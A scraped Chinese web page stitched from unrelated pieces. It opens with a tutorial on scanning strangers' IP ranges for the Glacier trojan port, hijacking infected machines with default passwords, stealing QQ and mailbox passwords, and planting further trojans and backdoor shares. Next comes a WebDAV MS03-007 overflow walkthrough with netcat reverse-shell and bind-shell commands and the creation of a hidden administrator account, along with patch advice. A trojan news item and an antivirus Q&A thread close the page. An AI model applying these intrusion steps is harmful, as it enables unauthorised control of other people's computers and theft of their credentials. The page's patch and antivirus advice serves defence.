【娱乐休闲】
【生活服务】
【电脑网络】
【文体教育】
【行业部门】
文章浏览→→→玩木马玩木马
玩木马如果你是高手，看了这篇文章你会觉得无聊，如果你是菜鸟（和我一样菜的话）或者会有点用。哪个人不爱玩？给我站出来！我要狠狠的KKKKK他一顿。5555.........好了，闲话少说为好，转入正题吧。首先我用到的工具主要是两个，1.扫描工具：代理猎手，2.冰河2.2客户端。（哪里有下载？自己找吧）下面分两步走：一.扫描篇：双击桌面上的代理猎手快捷图标，进入代理猎手主操作台.点击左上角三角形下面的“搜索任务”，点击下面的“添加任务”，进入“添加搜索任务”窗口，任务类型选“搜索网址范围”，按“下一步”，进入地址范围窗口，接着按右边的“添加”，在弹出的窗口中，地址范围类型选“起止地址范围”，起止地址填上你要扫描的IP段（例如61.150.0.0）结束地址填上例如（61.150.255.255），按“确定”，见到我刚才填的IP段出现在窗口中。接着按“下一步”，进入端口和协议窗口，按右边的“添加”，在弹出的小窗口中选“单一端口”，下面数字框中填上冰河的默认端口7626协议选“HTTP”，在旁边的“必搜”前打上钩。按“确定”，就看到了我刚才填的端口和协议出现在窗口中，按“完成”，这时回到添加前的窗口。看到框框中已有了我刚才填的内容 ，左上角的三角形也由开始的灰色变了现在的蓝色，这时按下这个三角形就开始了我的第一次搜索任务（这时操作台下面的数字会不停的跳动，表示正搜索中），这时按下红色停止按钮下面的“搜索结果”按钮，就看到了搜索的结果，如果有端口7626开的机器扫到，就会在窗口中显示该机的IP地址，(验证超时那些先不要理它,反正它的端口7626是打开了),如果你选IP段好运的话，很快就会有机器被你扫描到！你不仿等到扫描到的机器有多几个时才停止扫描，这样你进别人的机器跳舞的机会就大大提高了！如果你真的那么倒霉扫不到的话，就换IP段来搜吧.不过要记住把先前的搜索任务删除掉再添加新的搜这里有一点要告诉你，代理猎手的其他设置你先不要搞（其余都是默认的），就按我上面提到的做就行了！好了，扫描到了一大堆的IP了，GO GO GO 进入主要的一步了。。。。。二。连接篇:运行冰河2.2客户端,进入操作台,点击左上角"添加主机"按钮,在弹出的窗口中,显示名称处填上我刚才扫描到的IP,密码先不填,端口填默认的7626.按"确定",这时看到了填入的IP出现在主操作台左边的窗口中了.重复上面的这一步,把扫描到的IP全部都填进去(省去了等一下连接一个填一次的麻烦),看到了所有的IP都填进去后,就开始了我们的第一次入侵(这里有一点要提醒一下的是,你在连接前一定要把你的防火墙和病毒监控关了).好了,双击操作台左边看到的IP,下面的状态条会滚动,等待一下,看看返回来什么信息.如果是"主机没有响应"或者"无法与主机连接",试多几次,还是一样的话,可能对方已离线或打开7626端口的不是冰河的服务端,就选下一个IP.好了,这个能连接,但返回的信息是"口令有误..."那这个我可以搞店了,先试冰河的通用密码,具体操作如下:右键点击该IP,在弹出菜单中选"修改",进入刚才添加IP的窗口,在"访问口令"处填上你所选的通用密码,按"确定".再到主操作台上"当前连接"的下拉菜单中找到你刚才修改了口令的IP,点击一下,看到"访问口令"处出现了多个"*******"号,这就是你填上的冰河通用密码了,再按一下旁边的"应用",再双击操作台左边该IP,就尝试再次连接,当看到"正在接收数据""完成"等字样时,呵呵,你已成功了.这部机你有了一切的操纵权了.看到了他的机器的分盘(C.D.E.F.G.等)在右边的屏幕中出现了,双击这个小图标,你就可以看到他的硬盘中的文件夹列表和文件,再通过用鼠标右键点击文件夹或文件,你就可以使用"复制","粘贴",删除","下载"等等功能了,你也可以上传一个文件给他远程打开,呵呵.如果你上传的是另一个木马,那他的机就又多中了一个马儿了..具体做什么自己想吧.去看看他在干什么吧,点击操作台上方"查看屏幕"按钮,图象格式处选"JPEG",(因为JPEG图象传输速度比BMP的传输速度要快),按确定,等一下一个小的屏幕就出来啦,这个就是对方的屏幕画面了,右键点击该小屏幕,在"自动跟踪"和"自动缩放"前打上钩,那么这个小屏幕就会跟随对方的屏幕变化而变化了.再去点击"命令控制台",看到各个命令类按钮,双击各个按钮会有不同的命令出了,你可以在"口令类命令"下的"历史口令"处查看他的QQ密码,上网密码等等,在"设置类命令"下的"服务器配置"中读取该冰河服务端的配置信息,也就是刚才阻档你连接的设置了的密码,要是对方有设置IP邮寄的话你也可以看到他的信箱号,用这个密码你或许能破了他的信箱(我用这个方法也真的破了好几个人的信箱哦,呵呵),你也可以修改了他的配置,换了你自己的密码和邮寄信箱.你也可以帮他的硬盘创建共享.以后他把冰河杀了你也可以用共享连接他啊!(等于给自己多留了个后门)其他功能就不说了,你自己慢慢去尝试吧!还有一种情况,就是你尝试了所有的通用密码都不能连接的话,就试试小飞刀原创的冰河漏洞吧,具体操作如下:当你用完了通用密码后还是显示"密码有误......",就去点击操作台窗口中的"我的电脑",在你的文件中找到你的冰河服务端,右键点选"远程打开",这时你依然看到是"密码有误....",但马上又多了一条传输进度条出来,显示正在传送文件,当看到了进度条完成后,下面的提示也变了,会显示"文件传送完毕"和"文件打开成功".这样你就可以不用密码连接进去了.(记住要先把你刚才填进去的密码删了,按"应用".当返回的信息是"文件传送完毕"和"文件打开失败"时,你可以上传其他的木马服务端(例如黑洞,公牛等等木马都可以)上去,这样也可以控制对方,但已不是用冰河客户端了,而是换了相对应的木马客户端.咳咳........进去后可别干坏事哦!其实玩了这么多的木马还是觉得冰河是再好用的(呵呵.这只是个人观点,你有好用的木马就告诉我一声吧),功能多多,易用,而且中冰河的机器也是再多的.其他功能就不一一说了..(呵呵呵.水平有限,看了可别笑掉牙,我可没钱给你补牙溢出专集日，微软发布MS03-007号安全公告：Microsoft IIS 5.0 WebDAV远程溢出漏洞，声称利用此漏洞溢出后可以得到localsystem权限，于是网上沸沸扬扬开始关注起此漏洞。到了3月下旬，发现此漏洞的老外发布了他的exploit，不过由于这个exploit是针对英文版的win2000的，所以对国内造成的影响不大。直至3月27日，国内某黑客在安全焦点上公布了其修改后的针对中文版win2000的此漏洞的exploit程序，于是第二天即3月28日，国内的各个黑客网站都纷纷提供了编译好的win平台下的WebDAV漏洞溢出攻击程序的下载，各个安全论坛便随处可见关于WebDAV远程溢出攻击的讨论，甚至更有甚者把溢出攻击过程做成了动画教程供人观摩，WebDAV漏洞溢出攻击在一夜之间"迅速走红"。而且，其攻击代码在3月29日时又被人改进，使其成功率又大幅提高，眼下WebDAV远程溢出攻击已经成为各种黑客最流行的攻击方法，其来势之迅速之猛烈是以前Unicode、printer等漏洞所不及，而且有被蠕虫制造者利用的可能，所以笔者认为有必要写此文章让广大网管和用户尽早了解这个漏洞情况及解决方案，以提高警惕、做好防范。一、 漏洞基本情况1、 漏洞名称及描述名称：Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞微软安全公告：MS03-007Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)地址描述：IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据，远程攻击者利用这个漏洞对WebDAV进行缓冲区溢出攻击，可能以Web进程权限在系统上执行任意指令。2、 受影响系统 &Microsoft IIS 5.0 - Microsoft Windows 2000 Professional/Server/ Datacenter Server SP3 - Microsoft Windows 2000 Professional/Server/ Datacenter Server SP2 - Microsoft Windows 2000 Professional/Server/ Datacenter Server SP1 - Microsoft Windows 2000 Professional/Server/ Datacenter Server &3、 什么是WebDAV组件Microsoft IIS 5.0 (Internet Information Server 5)是Microsoft Windows 2000自带的一个网络信息服务器，其中包含HTTP服务功能。IIS5默认提供了对WebDAV的支持，WebDAV（基于Web的分布式写作和改写）是一组对HTTP协议的扩展，它允许用户协作地编辑和管理远程Web服务器上的文件。使用WebDAV，可以通过HTTP向用户提供远程文件存储的服务，包括创建、移动、复制及删除远程服务器上的文件，但是作为普通的HTTP服务器，这个功能不是必需的。4、 漏洞产生的原因这个漏洞产生的原因具体是由于WebDAV使用了ntdll.dll中的一些API函数，而这些函数存在一个缓冲区溢出漏洞，而Microsoft IIS 5.0带有WebDAV组件对用户输入的传递给ntdll.dll程序处理的请求未作充分的边界检查，远程入侵者可以通过向WebDAV提交一个精心构造的超长的数据请求而导致发生缓冲区溢出，成功利用这个漏洞可以获得LocalSystem权限，这意味着入侵者可以获得主机的安全控制能力。所以确切地说，这个漏洞并不是IIS造成的，而是ntdll.dll里面的一个API函数造成的。也就是说，很多调用这个API的应用程序都存在这个漏洞。5、 测试代码：见附件WebDAV远程缓冲区溢出漏洞的基本情况我们这里介绍到这里了，如果读者有兴趣想进一步了解这个漏洞具体的溢出原理分析，建议可以去安全焦中参阅isno写的两篇关于WebDAV远程溢出漏洞分析的文章，很精彩！我这里就不班门弄斧了。 二、如何检测漏洞在上面介绍漏洞基本情况的时候，我们已经说了IIS 5.0的默认配置是提供了对WebDAV的支持，也就是说，如果你的win 2000提供了IIS服务而没有打过针对此漏洞的补丁，那么一般情况下你的IIS就会存在这个漏洞，但如何来确定呢？我们可以借助一些工具来帮我们进行检测。1、 第一个检测工具：Ptwebdav.exe下载地址简介：Ptwebdav.exe是一个老外写的专门用来远程检测Windows 2000 IIS 5.0服务器是否存在WebDAV远程缓冲区溢出漏洞的东东，其操作界面非常简单，只要在其"IP or hostname"中填入要检测的主机和IIS服务端口，然后按"check"就可以了。笔者正用它来检测本地主机是否存在WebDAV漏洞，一会儿它就会在下面窗口里显示结果。这个工具不错，但它每次只能检测一台机子，如果你想检测一个网段内所有主机就比较麻烦了，一台台地检测不知道要检测到什么时候。让我们来看看第二个检测软件，它能帮我们解决这个问题。2、 第二个检测工具：WebDAVScan v1.0下载地址简介：WebDAVScan是一个专门用于检测网段内的Microsoft IIS 5.0服务器是否提供了对WebDAV的支持的扫描器，软件非常小，只有7.23KB，而且是个绿色软件，无须安装，直接运行即可！扫描后如有此安全漏洞，软件会自动生成扫描报告，原来也是老外写的，不过我们这里用的是WebDAVScan的汉化版。笔者扫描X.X.23.1-X.X.23.254的网段大概用了30秒时间，速度很快，窗口右边显示的是结果，"Enable"表示了此IIS支持WebDAV，至于有没有漏洞要看它有没有打过补丁了。经笔者测试，这个软件确实很不错，推荐大家使用，好了，WebDAV的检测也介绍完了，下面我们开始讲利用此漏洞测试攻击了。二、 漏洞测试攻击自从WebDAV的exploit代码出现后，网上紧接着就出现了好几种版本的溢出攻击程序，虽然其核心代码类似，但具体的功能和操作还是有些区别的，我们这里来了解两个WebDAV的溢出攻击程序。1、 第一个溢出程序：wb.exe下载地址简介：wb.exe是一个win32平台下已经编译好的针对英文版的IIS--webdav远程溢出攻击程序，原代码的作者是Crpt的kralor，使用时行用Netcat在本地监听某个端口，如nc -L -p 666，然后使用此程序对远程主机进行溢出攻击，溢出成功后就能在本地监听口上获取远程主机的反向连接，获取localsystem权限的cmdshell，它需要指定远程主机反向连接主机IP、端口、补丁信息等参数：syntax: c:\K_WEBDAV.EXE&victim_host&&your_host&&your_port&[padding]，如 your_ip 666 3 ，攻击如果成功，那Netcat的监听窗口就会出现远程主机的shell。2、 第二个溢出程序：webdavx.exe下载地址简介：webdavx.exe是一个针对中文版server溢出程序，它是根据安全焦点Isno的perl代码编译成的，这个版本只对中文版的有效，它的使用也不同于wb.exe，它溢出成功后直接在目标主机的7788端口上捆定一个localsystem权限的cmdshell，不像wb.exe需要反向连接，入侵者只要telnet到7788端口就可以了，所以用它在局域网内也能对局域网的主机进行攻击，当然wb.exe使用反向连接也有它的好处，因为许多WEB服务器的防火墙都设置为只允许通过到端口80的TCP连接，这样即使开了7788端口你也连接不上，而使用反向连接可以突破防火墙的TCP过滤，所以这两个软件各有用处各有特点，可以根据不同的需要进行选择。3、 测试攻击实例虽然讲了两个攻击软件的用法，但都只是纸上谈兵，我们还是来实际测试一下这个漏洞的威力如何！我们测试的是中文版的IIS主机，使用的扫描软件是WebDAVScan的汉化版，攻击软件是webdavx.exe，为了输入方便，我把webdavx.exe改名为web.exe，在刚才介绍WebDAVScan 的时候我们已经扫描到的IIS支持WebDAV的主机中选一台，找开CMD,输入：&c:\web 2x..x.23.68 send buffer…(正在溢出) telnet target 7788(溢出完成，请尝试telnet连接目标主机的7788端口)c:\telnet 2x..x.23.68 7788 正在连接到2x..x.23.68… Microsoft Windows 2000[Version 5.00.2195] &C&版权所有制Microsoft Corp c:\winnt\system32& (溢出成功，已经连接到其7788端口) &当然事情上溢出不一定成功，如果telnet连接提示失败就说明溢出可能不成功，这里是笔者N次试验的结果，不过现在webdavx.exe的溢出代码重新进行了改进，其溢出成功率大幅提高，估计在1/2左右。而且得到的应该是system权限，比超级用户还高一级，可以加个administrator组的成员来试试：c:\winnt\system32&net user hacker 111111 /add The command completed successfullyC:\winnt\system32&net localgroup administrators hacker /addThe command completed successfully命令成功了，看来System权限是真的了，那不是可在机器上干任何事情了？还真有点可怕！好了，我们这里只是测试，到此就停止吧！三、 漏洞消除方案我们上面已经看到了WebDAV远程溢出攻击的威力了吧，而到本文截稿为止，国内网络上的WebDAV远程溢出攻击是越来越多了，你的IIS服务器一不小心就有可能被黑客攻击而成为被控制的傀儡，所以管理员和用户们千万不能大意，一定要尽快地堵上这个漏洞，千万不能再重演像MSSQL的远程溢出漏洞那样的惨痛教训了。具体的可以通过以下几个方案来解决：⑴ 安装补丁，目前微软已经提供了此漏洞的补丁，下载地址details.aspx?FamilyId=C9A38D45--B62E-C69D32AC929B&displaylang=en 或者，你也可以作用微软提供的IIS Lockdown工具来防止该漏洞被利用。 ⑵ 如果你不能立刻安装补丁或升级，也可以手工修补这个漏洞，我们上面已经说了WebDAV功能对一般的Web服务器来说并不需要，所以可以把它停止掉。WebDAV在IIS 5.0 WEB服务器上的实现是由Httpext.dll完成，默认安装，但是简单更改Httpext.ell不能修正此漏洞，因为WINDOWS 2000的WFP功能会防止系统重要文件破坏或删除。要完全关闭WebDAV包括的PUT和DELETE请求，需要对注册表进行如下更改：启动注册表编辑器，搜索注册表中的如下键：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters 找到后点击"编辑"菜单，点击"增加值"，然后增加如下注册表键值：value name: DisableWebDAVData typeWORDvalue data: 1最后别忘了重新启动IIS，只有重启IIS后新的设置才会生效所属分类：→&&&&作者：新浪博客&&&&时间： 0:00:00
All Right Reserved无盘中国 -
Powered by Discuz!
后使用快捷导航没有帐号？
扫一扫，访问微社区
只需一步，快速开始
随时随地，快速访问
只要手机在手，您都可以快速、方便地看贴发帖，与论坛好友收发短消息。
极致优化，畅快"悦"读
独有的论坛界面和触屏设计，手机论坛也变得赏心悦目，操作自如。
即拍即发，分享生活
不管是风景图画，还是新闻现场，拍照发帖一气呵成，让您在论坛出尽风头。
下载客户端后，拍摄二维码快速访问本站:
或者通过以下地址访问:
Powered by当前位置： &
“夺命锁”木马锁死6万台智能手机
10:19:26 &胡弘毅 & &
&&&&【中华网科技讯】日前，一款强制锁死手机的--&夺命锁&被曝光。据悉，该木马的特点是伪装成不同的手机应用，诱骗Android手机用户下载安装。在木马发作后，用户手机将被强制锁死24小时。目前已经有6万台手机被感染。
&&&&据360手机安全工程师王欢介绍说，&夺命锁&最初实际并非木马，只是一款名为&不要好奇，千万别打开&的恶搞程序。不过，后来木马作者不满足于此，陆续制作了近600款伪装成Android应用或者游戏的恶意程序，诱导用户下载。
&&&&目前该木马已经感染了近6万台手机，这些手机在被感染后将被锁死24小时，在此期间，用户无法进行任何操作，重启也将无效。最令人担忧的是，&夺命锁&木马很可能会进化成&敲竹杠&木马，对手机用户的财产安全造成威胁。
(责任编辑：CT007)
眼界文学书评影视思想木马病毒_百度知道
?中毒后电脑除了重新做系统改怎么杀毒啊?，不知道我哪台电脑出现木马病毒了?我的QQ号码昨天被别人盗取了？，请教各位怎么鉴别哪个电脑中毒了?？
提问者采纳
avast等都是很好的杀软，服务项中有无可疑的服务项在运行2，可以看看任务管理器有无可疑的进程。另外每台机的杀毒软件是必备的。 推荐，那就行了1，杀木马很强nod32 360专版免费使用半年，免费一月avast 完全免费avg 完全免费，只要能把毒杀了，每台机都杀一下木马比较安全：用卡巴。3.中毒不一定要重做系统。如卡巴.建议安装一个木马专杀（如木马杀客。顺便检查一下每台机是否都干净。按照自己的喜好去选择一个好的杀软，AVG）每台机子上都安装一下.光凭眼睛看的话得有经验的人才能看得出来。现在建议首先你要做的就是每台机装个杀软。开机按F8选择进入去安全模式下查杀，eset nod32。然后查杀木马
提问者评价
其他类似问题
为您推荐：
其他7条回答
专门杀顽固木马的。如果碰到杀不了的木马可以试试360系统急救箱。如果还不放心可以开机时按F8键进入安全模式全盘扫描，一般的木马都能解决掉，或重装系统了怀疑电脑有木马的话可以用360安全卫士和杀毒软件对电脑进行全盘扫描，有木马的话一般都能发现、到论坛求助。还不行可以请教专业人士
用好一点的杀软如卡巴、小红伞、麦咖啡、大蜘蛛、NOD32、AVAST等到安全模式下全盘杀毒。
呃。。有几台电脑啊？要想知道的话，当然要装个杀毒软件做一次全盘的扫描咯。既然你有很多台电脑的话，出于成本的考虑，给你推荐微软的免费杀毒软件MSE，第一因为这个是免费的，你不用花钱；第二MSE的查杀效果确实很好，尤其对木马；第三提醒你安装之后升级一下病毒库再进行查杀。祝你早日解决问题。PS：赶紧找回QQ密码然后申请严格的QQ密保。。
安装微软杀毒套件吧
西海岸测试杀毒率100% 误杀率0%
并且永久免费啊（只要你系统是正版）
试试金山毒霸，很好用、、去官方下个免费版即可。。
那就的看MAC了，因为既然是别台的那他们之间肯定有通信。请问你那一共多少台？
下载360呗！简单！笨蛋！
木马病毒的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}